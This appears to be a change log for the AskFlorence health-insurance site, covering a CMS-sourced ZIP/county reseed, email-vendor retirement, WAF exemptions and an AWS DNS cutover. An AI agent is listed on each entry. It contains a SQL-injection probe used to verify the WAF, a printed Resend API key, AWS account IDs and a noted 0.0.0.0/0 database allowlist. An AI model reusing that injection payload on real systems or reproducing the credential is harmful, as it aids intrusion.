scripts/db/build-cms-snapshot.js(NEW) — one-shot script that queries CMS Marketplace API/counties/by/zip/{zip}for every ZIP in our SBE coverage universe (13,072 ZIPs from the existing Census-derived universe). 5-concurrent at ~23 req/sec, ~10 min runtime. Resume-capable via checkpoint file. 200 × HTTP 429 events auto-recovered via 5-second backoff.scripts/db/data/sbe-zip-cms-snapshot.json(NEW, 1.2 MB committed) — per-ZIP CMS response:{ zip: [{ countyFips, county, state }, ...], ... }. The operational source of truth; production traffic never re-queries CMS for these ZIPs.scripts/db/seed-sbe-zips-from-cms.js(NEW, ~330 lines) — corrective ingest script. Three modes (--dry-run/--apply/--rollback). For each(zip, countyFips)from the snapshot, applies four-way classification:federal-exists(preserve),federal-gap(log),sbe-insert(new doc),sbe-refresh(idempotent),sbe-conflict(log). Marker tag_seedSource: "cms-2026-04-30"on every INSERT enables clean rollback.scripts/db/seed-sbe-zips.js— minor--rollbackdefect fix (was a dry-run-only). Marked deprecated in header docstring.scripts/db/data/sbe-zip-state-2020.csv— kept in repo as historical lineage; superseded by the CMS snapshot.
Code (route + hook for cross-state ZIPs):
src/app/api/counties/route.ts— short-circuit only whendocs.every((d) => d.sbeRedirect)(truly fully-SBE ZIP). Otherwise return multi-county with per-countysbeRedirectannotation. Mirrors how healthcare.gov surfaces cross-state ZIPs (user picks the county they actually live in).src/lib/types.ts—County.sbeRedirect?added as optional field.src/lib/hooks/use-calculator.ts— post-county-pick: if selected county carriessbeRedirect, setphase=state_marketplaceinstead of proceeding to/api/eligibility. PostHog event taggedsource: "per_county_pick".
Docs:
docs/infrastructure/data-sources.md— CMS Marketplace API replaces Census ZCTA as canonical SBE-ZIP source. Original Census source marked SUPERSEDED.- This change-log entry (the original 17:30Z entry below stays intact as historical record).
Apply results (identical on staging + prod)
| Step | Operation | Count |
|---|---|---|
| Rollback (broken seed) | seed-sbe-zips.js --rollback removed 13,015 docs (sbeRedirect + no countyFips) | 13,015 |
| Apply (corrective) | seed-sbe-zips-from-cms.js --apply inserted CMS-sourced per-county docs | 17,537 |
| Federal/NY preserved | Guard 1 left existing federal-30 + NY county docs untouched | 30,326 (unchanged) |
| Fix-stale-zips style | 12 entries from fix-stale-zips.js left untouched | 12 (unchanged) |
| Total docs after corrective seed | — | 47,875 |
Math identity: 30,326 + 12 + 17,537 = 47,875 ✓ on both clusters.
Why 17,537 > original 13,015: CMS returns multi-county for many SBE-state ZIPs (3,510 ZIPs are multi-county per the snapshot), and cross-state border ZIPs now correctly get separate docs per CMS-returned county.
Federal data gaps surfaced (logged for follow-up — federal data has its own PUF-driven ingest pipeline; auto-insert deliberately not done here):
- zip=30555 → CMS reports TN/47139 Polk County (we don't have)
- zip=30559 → CMS reports NC/37039 Cherokee County (we don't have)
- zip=88240 → CMS reports TX/48165 Gaines County (we don't have)
CMS data gaps: 4 ZIPs returned 0 counties from CMS (same family as 02101 from the temp-fix's edge case). Continue to fall through to the existing CMS API fallback in route.ts (defense-in-depth).
Verification
Probe matrix on https://askflorence.health/api/counties (post route+hook deploy):
SBE-only ZIPs (single SBE state, single redirect):
- 90001 (CA), 02115 (MA), 06103 (CT), 80202 (CO), 21201 (MD), 02903 (RI), 89101 (NV), 87501 (NM), 19103 (PA), 98101 (WA), 20001 (DC), 05601 (VT), 04101 (ME), 60601 (IL) → all
{ sbeRedirect: ... }HTTP 200 from MongoDB
Cross-state border ZIPs (NEW — multi-county with per-county SBE):
- 03579 (NH+ME) →
{ counties: [{NH/Coos, no sbeRedirect}, {ME/Oxford County, sbeRedirect: ME}] }← user picks - 19973 (DE+MD) →
{ counties: [{DE/Sussex, no sbeRedirect}, {MD/Dorchester County, sbeRedirect: MD}] } - (similar pattern for 24604, 30165, etc.)
Federal/NY happy paths (unchanged):
- 84094 (UT), 10282 (NY), 19701 (DE), 75001 (TX) →
countiespayload from MongoDB unchanged
Compliance posture
| Framework | Control | Posture |
|---|---|---|
| HIPAA | §164.312(c) Integrity | Three-guard safety + Atlas audit log proves no mutation of verified federal/NY data |
| HIPAA | §164.312(b) Audit controls | All writes recorded in Atlas audit log; CloudTrail on Secrets Manager fetches |
| SOC 2 TSC | CC6.1 / CC7.1 / CC8.1 | Idempotent script + dry-run gate + reviewed apply + dated change-log entry + IaC |
| NIST 800-53 R4 (MARS-E 2.2) | CM-3 / SI-7 | Reproducible CMS snapshot + tier-1.5-ready data + corrective change documented |
| EDE Phase 3 | Data provenance | Source URL committed in script; CMS-canonical FIPS enables byte-for-byte audit comparability with CMS |
Net effect
- Pre-correction (broken seed): SBE redirect docs had no FIPS — couldn't be audited against CMS. Cross-state border ZIPs served only the federal portion. Architectural promise (byte-for-byte CMS parity) violated.
- Post-correction: every SBE doc carries CMS-canonical (zip, countyFips, county, state). Cross-state border ZIPs return multi-county responses; user picks the county they live in (federal → plan flow, SBE → marketplace redirect). Tier-1.5 SBE audit becomes possible.
Rollback
bash
MONGODB_WRITE_URI=$(aws --profile askflorence-prod secretsmanager get-secret-value \
--secret-id prod/mongodb/app-write --query SecretString --output text) \
node scripts/db/seed-sbe-zips-from-cms.js --rollbackDeletes only docs with _seedSource: "cms-2026-04-30". Federal/NY data + fix-stale-zips entries protected by construction.
Annual refresh playbook
Embedded in scripts/db/seed-sbe-zips-from-cms.js header docstring + summarized in data-sources.md. At plan-year transition: re-run build-cms-snapshot.js → review STATE_BASED_MARKETPLACES → dry-run → staging apply + verify → prod apply + verify → tier audits → change-log entry.
2026-04-30T17:30Z — SBE-state ZIP MongoDB-first ingest (retires CMS fallback dependence)
⚠ SUPERSEDED 2026-05-01T01:22Z: this seed shipped without
countyFipsand used Census instead of CMS as the source. See entry above for the corrective seed that replaced it. This entry preserved as historical record.
Actor: taha.abbasi via SSO AdministratorAccess (staging 549136075525 + prod 039624954211 via Atlas user app_writer_plans + prod app-write from Secrets Manager); agent: Claude Opus 4.7 Linked: Issue #68 (proper data-side fix). Follow-up to commit 1e5258a (CMS API fallback temp fix, 2026-04-30T07:55Z, comment on #47).
Why
The temp fix that landed earlier today routed every SBE-state ZIP request through a CMS Marketplace API call to learn the state. That worked but introduced an external dependency on the consumer hot path, ~250ms first-hit latency, and a CMS-API-outage failure mode. The intended long-term architecture (established by Issue #49 / commit 330871e for federal-30 + NY plans) is MongoDB-first for every U.S. ZIP. This change seeds every SBE-state ZIP into MongoDB with redirect-only docs so /api/counties returns sbeRedirect from owned data without external API calls.
What shipped
Code changes:
src/lib/constants.ts— addedIL: "Get Covered Illinois (getcovered.illinois.gov)"toSTATE_BASED_MARKETPLACES. IL launched its SBE in 2025 plan year; prior to this change IL was a real coverage gap (SBE_STATES included IL but the marketplace map didn't, so IL ZIPs returned 404 with no redirect banner).scripts/db/seed-sbe-zips.js— new ingest script. Three modes:--dry-run(default),--apply,--rollback. Optional--verify-cms-sampleruns 200-ZIP CMS cross-check at 1 req/sec for source-quality validation. ~430 lines including embedded refresh playbook in header docstring.scripts/db/data/sbe-zip-state-2020.csv— committed snapshot of SBE-state ZIPs from U.S. Census 2020 ZCTA-to-County relationship file. 13,084 rows (zip,state,county_fips_sample). Reproducible, airgap-safe.docs/infrastructure/data-sources.md— new doc covering the data ingestion pipeline lineage, refresh cadence, conflict log archive (45 border-ZIPs not auto-redirected), provenance + audit trail.docs/.vitepress/config.ts— sidebar entry for the new doc.
Data writes (idempotent, three-guard safety):
| Mongo cluster | Operations | Result |
|---|---|---|
Staging Atlas (project askflorence-staging, M0) | 13,027 inserts + 12 unchanged + 45 skipped (CONFLICT) | Total docs 30,338 → 43,353 |
Prod Atlas (project AskFlorence, M10 HIPAA, cluster askflorence-prod-01) | 13,027 inserts + 12 unchanged + 45 skipped (CONFLICT) | Total docs 30,338 → 43,353 |
Math checks identically on both: 30,326 (clean federal/NY, untouched) + 12 (existing fix-stale-zips, untouched) + 13,015 (new redirect-only) = 43,353. Zero federal-30 or NY county docs were mutated — Guard 2 worked.
The 45 CONFLICT skips are all real border ZIPs spanning SBE + federal counties (ME/NH, DE/MD, VA/WV, NC/VA, MN/SD, etc.). Catalogued in data-sources.md as future per-county-redirect scope. Existing federal data continues to serve them correctly.
How
- Recon against prod read replica via
app-read: confirmed 31 states with plans (federal-30 + NY) and 30,338 zip_county docs. - Source data prep: downloaded Census ZCTA-County file, derived state from county FIPS prefix, filtered to SBE-state ZIPs, committed snapshot CSV.
- Staging Atlas access: temporarily added laptop IP to staging Atlas allowlist (project
askflorence-staging); usedapp_writer_plansuser from staging Secrets Manager (staging/mongodb/plans-write) for the apply. - Staging dry-run + apply: 13,027 inserts (verified all 19 SBE states + DC + IL).
- Staging smoke: 19-probe matrix on
stage.askflorence.health/api/counties. All SBE states + IL →sbeRedirect200 from MongoDB; federal/NY paths unchanged. - Prod apply: same script run with prod
app-writeURI from Secrets Manager (prod/mongodb/app-write). Identical results. - Prod smoke: 19-probe matrix on
askflorence.health/api/counties. All match. - Cleanup: removed temp laptop IP from staging Atlas allowlist.
Verification
Probe matrix on https://askflorence.health/api/counties (all returned HTTP 200 with the documented sbeRedirect payload from MongoDB):
| ZIP | State | Marketplace |
|---|---|---|
| 90001 | CA | Covered California |
| 02115 | MA | Massachusetts Health Connector |
| 06103 | CT | Access Health CT |
| 80202 | CO | Connect for Health Colorado |
| 21201 | MD | Maryland Health Connection |
| 02903 | RI | HealthSource RI |
| 89101 | NV | Nevada Health Link |
| 87501 | NM | beWellnm |
| 19103 | PA | Pennie |
| 98101 | WA | Washington Healthplanfinder |
| 20001 | DC | DC Health Link |
| 05601 | VT | Vermont Health Connect |
| 04101 | ME | CoverME.gov |
| 60601 | IL | Get Covered Illinois |
| 84094 (UT, federal) | — | counties payload from MongoDB ✓ unchanged |
| 10282 (NY, owned) | — | counties payload ✓ unchanged |
| 19701 (DE, federal) | — | counties payload ✓ unchanged |
| 75001 (TX, federal) | — | counties payload ✓ unchanged |
| 00000 (invalid) | — | 404 ✓ unchanged |
Compliance posture
| Framework | Control | Posture |
|---|---|---|
| HIPAA | §164.312(c) Integrity | Tier audits + Atlas audit log + script's three guards prove no mutation of verified data |
| HIPAA | §164.312(b) Audit controls | Atlas audit log records every write op; CloudTrail records every Secrets Manager fetch |
| SOC 2 TSC | CC6.1 / CC7.1 / CC8.1 | Idempotent script + dry-run gate + reviewed apply + dated change-log entry |
| NIST 800-53 R4 (MARS-E 2.2) | CM-3 / SI-7 | Three-guard safety + reproducible snapshot + tier audit verification |
| EDE Phase 3 | Data provenance | Source URL committed in script header; CSV snapshot committed for audit reproducibility |
Net effect on the consumer hot path
- Pre-change:
/api/counties?zip=<SBE-zip>→ MongoDB miss → CMS Marketplace API call → response (~250ms first-hit, cached after) - Post-change:
/api/counties?zip=<SBE-zip>→ MongoDB hit → response (~5ms, federal-NY parity)
The CMS fallback in src/app/api/counties/route.ts is kept as defense-in-depth (per the original plan), now dormant for steady-state traffic. The in-memory cmsFallbackCache should stay near-empty over time — that's the verifiable signal that ingest succeeded. Decision to keep-or-retire the fallback: deferred 1 week post-deploy.
Rollback
bash
MONGODB_WRITE_URI=$(aws --profile askflorence-prod secretsmanager get-secret-value \
--secret-id prod/mongodb/app-write --query SecretString --output text) \
node scripts/db/seed-sbe-zips.js --rollbackRollback only removes redirect-only docs (sbeRedirect with no countyFips) — fix-stale-zips entries (countyFips + sbeRedirect both set) are protected and stay intact.
Notes for next refresh
- Census ZCTA refresh cadence: the Census 2020 ZCTA file refreshes ~annually around June. New 2030 boundaries will land circa 2031-2032.
- Annual at plan-year transition: re-run the script + smoke matrix. Refresh playbook embedded in
scripts/db/seed-sbe-zips.jsheader docstring; mirror indata-sources.md. - STATE_BASED_MARKETPLACES drift: cross-check against CMS's Marketplace operating-status page during plan-year transitions. States may transition to/from SBE.
- Per-county SBE redirect for border ZIPs is a future enhancement tracked on Issue #68 (would change
/api/countiesresponse shape + frontend consumer). Not in scope for the seed ingest.
2026-04-30T17:19Z — Phase 11 hardening: Resend retirement (Secrets Manager + IAM + ECS task def)
Actor: taha.abbasi via SSO AdministratorAccess (prod 039624954211); agent: Claude Opus 4.7 Linked: Issue #47, Issue #57 (vendor BAA register).
Why
Apex (askflorence.health) has been on AWS SES exclusively since the Phase 10 cutover (2026-04-23T01:45Z entry above). Vercel-side Resend has been broken since 2026-04-10 (literal \n in API key + Resend domain in failed status, no DKIM CNAMEs). Decision per the Phase 10 entry: retire rather than revive. SES out of sandbox + verified working end-to-end (4 form-flow probes + 2 direct CLI sends, 0 bounces / 0 complaints / 0 rejects).
What shipped
Code (working tree, awaiting commit + CI deploy):
src/lib/email.ts— Resend code path stripped; module collapsed to SES-only. ~80 lines deleted.src/app/api/waitlist/route.ts—addToAudience(),RESEND_API_BASE,AUDIENCE_ID, theRESEND_API_KEY not configured500-gate, the audience-sync block, andresend_ok/resendfrom response + PostHog all removed. ~50 lines deleted.src/app/api/agents/discovery/route.ts—canSendEmailguard removed;getEmailProviderimport dropped.src/app/_home/components/TargetPage.tsx— wired the homeGet early accessbutton toPOST /api/waitlist(was a no-op since the v0.29.0 home swap; latent bug surfaced + fixed in same session).- TS + lint clean.
Infra (applied, this entry's timestamp):
infra/envs/prod/ecs.tf— removedRESEND_API_KEY = module.secrets.secret_arns["resend-api-key"]from the secret-injected env vars block.infra/envs/prod/secrets.tf— removed"resend-api-key"entry from the secrets-spec for-each map.terraform plan:0 to add, 1 to change, 2 to destroy— IAMSecretsReadpolicy update + Secrets Manager secret destroy + secret-version destroy.- ECS task definition rolled FIRST (before
terraform apply) becauselifecycle { ignore_changes = [container_definitions] }in the ecs-service module means env-var bindings on running tasks aren't tracked by Terraform: pulled:20task def → filtered out theRESEND_API_KEYsecret entry →aws ecs register-task-definition→ service updated to:21→ watched rollover stabilize (PRIMARY :21 fully running, ACTIVE :20 drained to 0). THENterraform apply. - Why this order: doing it in reverse would have destroyed the secret + revoked IAM access while running tasks still referenced
RESEND_API_KEYin their task def, breaking new task startups (autoscale, restart, deploy).
Verification
aws sesv2 get-account—ProductionAccessEnabled: true,SendingEnabled: true,EnforcementStatus: HEALTHY.- 6 form-flow probes on apex (4 pre-retirement + 2 post-retirement) — all 200 with Mongo writes succeeding; SES per-minute Send metric ticked correctly.
- 2 direct
aws sesv2 send-emailCLI tests — both delivered with validMessageIds. AWS/SES/Send: 12 sends in window, 0 bounces, 0 complaints, 0 rejects.- Apex
/api/health200 throughout rollover + apply. aws secretsmanager describe-secret --secret-id prod/resend-api-key→DeletedDate: 2026-04-30T17:19:12-06:00(default 30-day recovery window, restorable if needed).aws iam get-role-policy askflorence-prod-app-task-execution SecretsRead→ resend-api-key ARN no longer in Resource list.
Compliance impact
| Framework | Control | Posture |
|---|---|---|
| HIPAA | §164.308(a)(1)(ii)(B) Risk management | One vendor removed from integration boundary; smaller PHI footprint |
| HIPAA | §164.314(a) BAA scope | Resend BAA chase eliminated (was pending under #57); SES covered under existing AWS Organizations BAA |
| SOC 2 TSC | CC6.6 / CC8.1 | Terraform IaC + this dated entry + CloudTrail in log-archive = audit evidence |
| EDE Phase 3 | MARS-E 2.2 inheritance | No change to inheritance posture |
Rollback
Within 30 days: aws secretsmanager restore-secret --secret-id prod/resend-api-key + revert the Terraform commit + terraform apply. Then re-create a Resend account + populate the secret value. The code-side rollback is git revert of the Resend-retirement commit.
After 30 days: secret is permanently destroyed; full re-create from scratch (new Resend account, new API key, new domain DKIM verification). Code-side rollback unchanged.
Practical answer: if there's any reason to revive Resend, do it before 2026-05-30T17:19Z.
Vercel — intentionally not touched
Per user direction ("leave it as is, I'll stop using it instead"), Vercel project's RESEND_API_KEY env var stays. Vercel-side emails have been broken for 3+ weeks anyway (key + domain both invalid since 2026-04-10). Vercel will be deprecated separately.
2026-04-30T09:00Z — WAF scoped exemptions: PostHog /ingest/* + social-crawler User-Agent allowlist
Actor: taha.abbasi via SSO AdministratorAccess (staging 549136075525 + prod 039624954211); agent: Claude Opus 4.7 Linked: Issue #47 Phase 11 hardening — comments at 2026-04-30T08:05Z (PostHog block) and Telegram-bot finding flagged in-session.
Why
Two managed-rule false-positive families surfaced post Phase 10 cutover, both expected when moving from Vercel default protections onto a real WAF on production traffic:
PostHog analytics returning zero events. Browser console showed
POST /ingest/e/and/ingest/s/returning HTTP 403 from WAF. PostHog dashboard receiving no events from apex traffic. Cause:AWSManagedRulesCommonRuleSetandAWSManagedRulesSQLiRuleSetpattern-match PostHog's gzip-compressed event payloads as suspicious bodies. The path is a first-party Next.js rewrite — no SQL or user input surface there.Social-media link previews broken on Telegram (149.154.0.0/16 hits
AWSManagedRulesAmazonIpReputationList), and the same family of false-positives expected to affect Facebook, LinkedIn, Slack, Discord, Twitter, WhatsApp, Apple iMessage, Reddit, Skype/Teams. Cloud datacenter CIDRs flagged wholesale by commercial threat-intel feeds. Direct funnel risk for consumer + agent acquisition flows that depend on shareable links.
What shipped
Single Terraform module change, applied to both environments:
infra/modules/cloudfront-waf/main.tf— addedscope_down_statementblocks to fourmanaged_rule_group_statementrules:- Priority 0
AWSManagedRulesCommonRuleSet— exempt URISTARTS_WITH /ingest/ - Priority 20
AWSManagedRulesSQLiRuleSet— exempt URISTARTS_WITH /ingest/ - Priority 30
AWSManagedRulesAmazonIpReputationList— exempt User-AgentCONTAINS(lowercase) any allowlisted crawler substring - Priority 40
AWSManagedRulesAnonymousIpList— same UA allowlist exemption
- Priority 0
infra/modules/cloudfront-waf/variables.tf— newposthog_proxy_uri_prefix(default"/ingest/") andsocial_crawler_user_agents(default 11-entry list: telegrambot, facebookexternalhit, facebookcatalog, linkedinbot, slackbot, discordbot, twitterbot, whatsapp, skypeuripreview, redditbot, applebot). Variable validation enforces ≥2 entries on the UA list (WAFv2or_statementrequirement).docs/infrastructure/cloudfront-waf-setup.md— new doc with full rule stack, scoped-exemption rationale, compliance mapping (HIPAA / SOC 2 / NIST 800-53 R4 / EDE Phase 3), residual-coverage proof, verification curls, operational runbook.docs/.vitepress/config.ts— new sidebar entry under Infrastructure for "CloudFront + WAFv2".
Rules NOT changed (defense-in-depth preserved):
AWSManagedRulesKnownBadInputsRuleSet(priority 10) — runs on every request including/ingest/*and crawler UAs.RateBasedBlanket2000 req/5min/IP (priority 100) — applies universally.- All other rule groups remain in BLOCK mode (override
none {}left intact). - WAF logging unchanged: every request still recorded to the CloudWatch log group with
action,terminatingRuleId,ruleGroupListfor forensics.
How
Module + env apply pattern, staging-then-prod:
terraform fmt -recursive modules/cloudfront-waf/+terraform validateininfra/envs/staging/→ green.terraform plan -target=module.cloudfront_staging→0 to add, 1 to change, 0 to destroy(web ACL modified in place with all 4 scope-downs).terraform apply -target=module.cloudfront_staging -auto-approve→ applied; web ACL4d7e1072-04b4-466b-b67a-5ce03036757d.- Staging verified with 7-probe curl matrix (PostHog 400, SQLi-on-counties 403, normal-traffic 200, crawler UAs 200) — all expected results.
terraform plan -target=module.cloudfront_prod→ same shape (1 to change).terraform apply -target=module.cloudfront_prod -auto-approve→ applied to web ACLe05c650b-4dec-456a-af42-3ec0a7c3dcdc.- Prod verified with 10-probe curl matrix (PostHog
/ingest/e/and/ingest/s/both 400 from PostHog NOT 403 from WAF; SQLi-on-counties 403; home/api 200; TelegramBot/facebookexternalhit/LinkedInBot/Slackbot UAs all 200;/api/healthenv=prod).
CloudTrail in log-archive captures wafv2:UpdateWebACL events for both apply runs (machine-readable change record per SOC 2 CC8.1 + EDE Phase 3 CM-3).
Compliance impact
The audit story strengthens with this change. Auditor walkthrough:
| Framework | Control | Posture |
|---|---|---|
| HIPAA | §164.308(a)(1)(ii)(B) Risk management | Documented risk-based decision with compensating controls |
| HIPAA | §164.312(b) Audit controls | All requests still logged to CloudWatch; WAF action field shows whether scope-down fired |
| SOC 2 TSC | CC6.1 / CC6.6 boundary protection | All rules remain BLOCK; exemptions are payload/identity-scoped not blanket allows |
| SOC 2 TSC | CC8.1 change management | Terraform IaC + reviewed change + this dated change-log = textbook evidence |
| NIST 800-53 R4 (MARS-E 2.2) | SC-7 boundary, SI-4 monitoring, AU-2/AU-3 audit | All preserved with ≥4 enforcement layers per request |
| EDE Phase 3 | MARS-E 2.2 inheritance | Both exemptions apply only to public-data paths (no PHI / PII / FTI / application / cms_hub data class today) |
Forward-compatibility checkpoints documented in cloudfront-waf-setup.md → "When to re-evaluate": Phase 5 cutover (agent portal/member dashboard ship), EDE Phase 3 audit prep (~Sept 2026), PostHog vendor decision (Phase 11).
Rollback
If a scope-down causes unforeseen behavior:
bash
# Disable PostHog exemption only:
# Set posthog_proxy_uri_prefix = "" in module call (or remove the override).
# Apply. Common + SQLi resume inspection of /ingest/*.
# Disable crawler UA exemption only:
# Set social_crawler_user_agents = [] in module call.
# Apply. IpReputation + AnonymousIp resume inspection of all UAs.
# Full revert: revert the commit. terraform apply restores prior rule structure.WAF state propagation is fast (under 60 seconds on managed rule changes); rollback is a single terraform apply away.
2026-04-24T01:45Z — Phase 10 DNS cutover + follow-up fixes (S3 uploads, email provider, Vercel write bug)
Actor: taha.abbasi via SSO AdministratorAccess (prod 039624954211 + mgmt 778477254880) + Cloudflare dashboard; agent: Claude Opus 4.7 Linked: Issue #47 Phase 10.
Why
Phase 8 built the prod AWS stack and served it on prod-canary.askflorence.health. Phase 9 validated end-to-end parity vs Vercel across 60/60 HTTP probes. Phase 10 moves the production apex DNS so real users hit the AWS stack. Along the way, three latent bugs surfaced and got fixed properly.
What shipped
DNS cutover (Cloudflare zone askflorence.health):
askflorence.healthapex:A 216.198.79.1 (Proxied)→CNAME d1pnfyzua893hx.cloudfront.net (DNS only), TTL 300swww.askflorence.health:CNAME askflorence.health (Proxied)→CNAME d1pnfyzua893hx.cloudfront.net (DNS only), TTL 300s- Vercel proxy path retired from DNS. Vercel deployment kept running as rollback target for 48h.
Follow-up fix 1 — Vercel pre-existing write bug. Audit discovered MONGODB_WRITE_URI="" on Vercel prod env (empty string, ~2 weeks stale). Consumer + agent waitlist + survey writes on Vercel had been silently failing with "MONGODB_URI_WAITLIST_WRITE or MONGODB_URI_SURVEY_WRITE or MONGODB_WRITE_URI must be set" that entire window. Rotated the app-write password on prod Atlas via atlas dbusers update, populated prod/mongodb/app-write in Secrets Manager, pushed the same URI to Vercel env, re-deployed Vercel. Writes resume on Vercel (which stays warm as the Phase 10 rollback).
Follow-up fix 2 — Prod SES in sandbox + Resend key bug. Post-cutover smoke surfaced email failures:
- SES in sandbox mode: only
[email protected]verified.[email protected]ops-notifications silently failing. - Attempted Resend fallback via
EMAIL_PROVIDER=resendto route through Resend while SES waited for prod-access approval. - Resend failed:
API key is invalid. Traced to the exact same literal-\nbug class as the CMS_API_KEY had — Vercel storedre_HDRhaUUw_6WV5EDvoRj1huQNRazQiNqki\n(backslash-n literal at end). Cleaned the key, re-tested — Resend now returnsupdates.askflorence.health domain is not verified(domain status "failed" on the Resend account since 2026-04-10; no Resend DKIM records were ever published to Cloudflare). Vercel email sending has therefore also been broken for ~2 weeks, compounding with the emptyMONGODB_WRITE_URIbug above. - Decision: flip
EMAIL_PROVIDERback toseson prod, file AWS SES production-access request with conservative volume framing (under 100/day current, under 500/day ceiling 60d, under 5k/day through end of 2026).updates.askflorence.healthis properly verified on the prod SES account (DKIM + MAIL FROM + DMARC, all SUCCESS per Phase 8). Resend retires per the original Phase 11 plan rather than being revived.
Follow-up fix 3 — Agent file upload path dead on AWS prod. Smoke test of /api/agents/discovery/upload surfaced missing IAM + env vars. Proper Terraform fix landed:
- New
infra/envs/management/s3-askflorence-data.tf— manages the bucket policy onaskflorence-data(mgmt account, 778477254880). Preserves existingDenyNonSSLRequestsstatement and addsAllowProdEcsTaskRolePutAgentSurveyUploadsstatement grantingarn:aws:iam::039624954211:role/askflorence-prod-app-tasks3:PutObjectonarn:aws:s3:::askflorence-data/agent-survey-uploads/*. Does NOT take ownership of the bucket resource itself (bucket predates Terraform). infra/envs/prod/ecs.tf— task role gains inline policyS3AgentSurveyUploadsWritegrantings3:PutObjecton the same prefix; task def env varS3_AGENT_SURVEY_BUCKET=askflorence-data.- No KMS grants needed: mgmt CMK
alias/askflorence-datakey policy already permits any org principal toGenerateDataKey/Decrypt/DescribeKeyvias3.us-east-1.amazonaws.com(legacy Tfstate-era statement, ViaService-bound). - GuardDuty Malware Protection for S3 (enabled Phase 2.5) continues scanning all new uploads under
agent-survey-uploads/regardless of writer. Scan-tag on successful upload. - Verified end-to-end:
POST /api/agents/discovery/uploadwith a real PDF returned HTTP 200 and wrote toagent-survey-uploads/custom/1776993996441-.../consent-template.pdfvia cross-account role-based auth.
Operational hygiene:
- Prod task def revision
:7registered with the S3 bucket env + EMAIL_PROVIDER=ses. Service rolled over cleanly; 2 HA tasks stay healthy. - Prod ECS smoke endpoint in the workflow switched from
prod-canary.askflorence.health(CloudFront + WAF — WAF false-positives the GitHub Actions runner IP) toorigin.askflorence.health(direct ALB via the wildcard SAN CNAME). Three prior CI runs failed on the WAF block; once switched, runs go green. - Prod ECR configured for immutable tags. CI workflow shifted from inline buildx cache (embeds cache into the image tag, incompatible with immutable-tag rewrites) to GitHub Actions
type=ghacache backend. No:latestpushed on prod — task defs pin to:<sha>only.
How
Four applies this session:
terraform applyininfra/envs/management/— adoptedaskflorence-databucket policy as Terraform-managed (1 resource).terraform applyininfra/envs/prod/— addedS3AgentSurveyUploadsWriteinline policy to task role (1 resource).aws ecs register-task-definitionout-of-band — new revision:7withS3_AGENT_SURVEY_BUCKETenv +EMAIL_PROVIDER=ses(per the ecs-service module'signore_changes = [container_definitions]design, TF doesn't push env changes directly).aws ecs update-service— rollover to task def:7. Service stable on new revision.
Cloudflare DNS cutover done via dashboard: both records edited, proxy turned OFF, TTL to 300s. Global DNS propagation < 1 min. First CloudFront edge log hit came in at SEA900-P10 within 15 seconds of save.
Rollback
- DNS rollback (< 5 min): revert Cloudflare records — apex back to
A 216.198.79.1 Proxied, www back toCNAME askflorence.health Proxied. Vercel deployment was not touched; serves seamlessly. Atlas allowlist still contains0.0.0.0/0so Vercel can still reach prod cluster. - S3 upload rollback:
terraform destroytheaws_s3_bucket_policy.askflorence_dataandaws_iam_role_policy.task_inline["S3AgentSurveyUploadsWrite"]. Bucket policy reverts to the pre-Terraform state (justDenyNonSSLRequests). Task role loses upload permission; endpoint returns the original "bucket not configured" error. No user data lost — bucket contents untouched. - Email provider rollback: flip
EMAIL_PROVIDERtask def env back toresend+ re-register + update-service. Caveat: Resend account + domain are both in a broken state, so this is not actually a viable rollback today.
Verification
All from operator laptop through public internet, https://askflorence.health:
GET /api/health→ 200 with"env":"prod"and commit SHA matching deployed image.GET /+/plans+/agents+/agent-onboarding+/agent-discovery+/updates+/privacy+/terms→ 200.GET /api/counties?state={TX,NY}&zip=...→ 200 identical JSON to Vercel.POST /api/eligibilitywith correct nested{household,place,year}shape → 200 with APTC + CSR tier (matched Vercel).POST /api/planswith same shape → 200 with 100 plans returned (matched Vercel).POST /api/waitlistconsumer + agent interest variants → 200 with real Mongo_id(write via peering).POST /api/agents/discovery/uploadwith valid PDF +docType=custom+blankConfirmed=true→ 200 with S3 object key. Object present inaskflorence-data/agent-survey-uploads/.GET /?id=1' OR '1'='1→ 403 via WAF SQLi rule.- Response headers:
server: AskFlorence, CloudFront POP header, HSTS + CSP + X-Frame-Options DENY. No trace of Cloudflare proxy or Vercel in headers. - ECS service: desired 2, running 2, rollout COMPLETED, task def
:7. Zero 5xx in last 10 min. 86+ real-user requests recorded on the ALB. - Phase 9 HTTP parity probe (pre-cutover gate): 60/60 across 20 stratified scenarios × 3 endpoints. 100%.
What this phase does NOT do
- Does not retire Vercel. Vercel keeps running as rollback target for 48h. Archive at T+48h if clean.
- Does not remove
0.0.0.0/0from prod Atlas IP access list. Vercel path stays until archive. Post-48h task. - Does not retire Resend API key. Account-level retirement is a Phase 11 task.
- Does not grant SES prod access. Separate AWS support ticket filed with the conservative framing; typical turnaround 24-72h.
- Does not provision narrow-scoped prod Atlas writers. #56 prod follow-up session.
2026-04-23T02:00Z — Phase 8 prod AWS mirror live (canary)
Actor: taha.abbasi via SSO AdministratorAccess (prod 039624954211 + mgmt 778477254880); atlas CLI against prod project 69dc20c64005b222804dafa4; agent: Claude Opus 4.7 Linked: Issue #47 Phase 8; session log 2026-04-22-phase-8-prod-mirror.md; commits 611f268, 03a8dfc, a189041, release v0.17.0.
Why
Staging has been fully validated through Phases 0-7 — the Next.js app runs on AWS ECS with peered Atlas connectivity behind CloudFront + WAF, and every integration has been end-to-end exercised. Phase 8 replays the same Terraform into the prod AWS account so the prod AWS stack is standing and serving traffic on a private canary URL before Phase 10 cutover. No real user is moved in this phase. Vercel keeps serving askflorence.health + www exactly as before.
What shipped
AWS (prod account 039624954211):
- VPC
10.20.0.0/16, 2 AZs, 2 NAT gateways (HA), 6 multi-AZ VPC endpoints. - KMS CMK
alias/askflorence-prod, rotation on. - 15
prod/*Secrets Manager entries. Populated from Vercel env + rotatedapp-writepassword + stopgap population of narrow-scoped write secrets with the broadapp-writeURI until #56 prod session. - ACM cert
askflorence.health+www+*.askflorence.health, DNS-validated via 2 Cloudflare CNAMEs, status ISSUED. - SES identity
updates.askflorence.health, DKIM + MAIL FROM SUCCESS, DMARCp=quarantine, 6 DNS records added at Cloudflare. Account still in sandbox. - ECR
askflorence-appwith immutable tags, scan-on-push, 50-image retention, CMK-encrypted. - ECS cluster
askflorence-prod, serviceaskflorence-prod-appwith 2 HA tasks (0.5 vCPU / 1 GB each), 90-day log retention. - ALB
askflorence-prod-alb-1177205004.us-east-1.elb.amazonaws.comwith HTTPS + deletion protection ON. - CloudFront distribution
E9RU8LOGSYL9I(d1pnfyzua893hx.cloudfront.net) serving 3 aliases (apex + www + prod-canary), PriceClass_All, same WAFv2 ruleset as staging, same response-headers policy. - Atlas prod peering
